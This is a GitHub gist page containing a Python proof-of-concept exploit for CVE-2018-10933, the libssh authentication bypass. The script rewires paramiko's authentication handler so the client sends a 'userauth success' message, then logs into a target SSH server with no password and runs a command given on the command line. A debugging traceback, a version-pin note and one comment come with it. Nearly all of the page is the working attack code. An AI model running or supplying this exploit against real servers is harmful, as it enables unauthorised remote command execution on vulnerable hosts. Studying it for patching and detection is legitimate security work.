-
-
Save thinkycx/6ec27dc470de03fb16c2f447dbbbd070 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
| # untested CVE-2018-10933 | |
| ''' | |
| # fixed - test by thinkycx and | |
| Traceback (most recent call last): | |
| File "10933.py", line 12, in <module> | |
| new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_SUCCESS] | |
| TypeError: 'property' object has no attribute '__getitem__' | |
| pip install paramiko==2.0.8 | |
| ''' | |
| import sys, paramiko | |
| import logging | |
| username = sys.argv[1] | |
| hostname = sys.argv[2] | |
| command = sys.argv[3] | |
| new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[ | |
| paramiko.common.MSG_USERAUTH_SUCCESS] | |
| def auth_accept(*args, **kwargs): | |
| return new_auth_accept(*args, **kwargs) | |
| paramiko.auth_handler.AuthHandler._handler_table.update({ | |
| paramiko.common.MSG_USERAUTH_REQUEST: auth_accept, | |
| }) | |
| port = 22 | |
| try: | |
| logging.basicConfig(stream=sys.stderr, level=logging.DEBUG) | |
| client = paramiko.SSHClient() | |
| client.set_missing_host_key_policy(paramiko.WarningPolicy) | |
| client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key") | |
| stdin, stdout, stderr = client.exec_command(command) | |
| print stdout.read(), | |
| finally: | |
| client.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello,maybe it‘s difficult to get shell . You can only see that your channel session is auth success.
For more info, see here with google translation.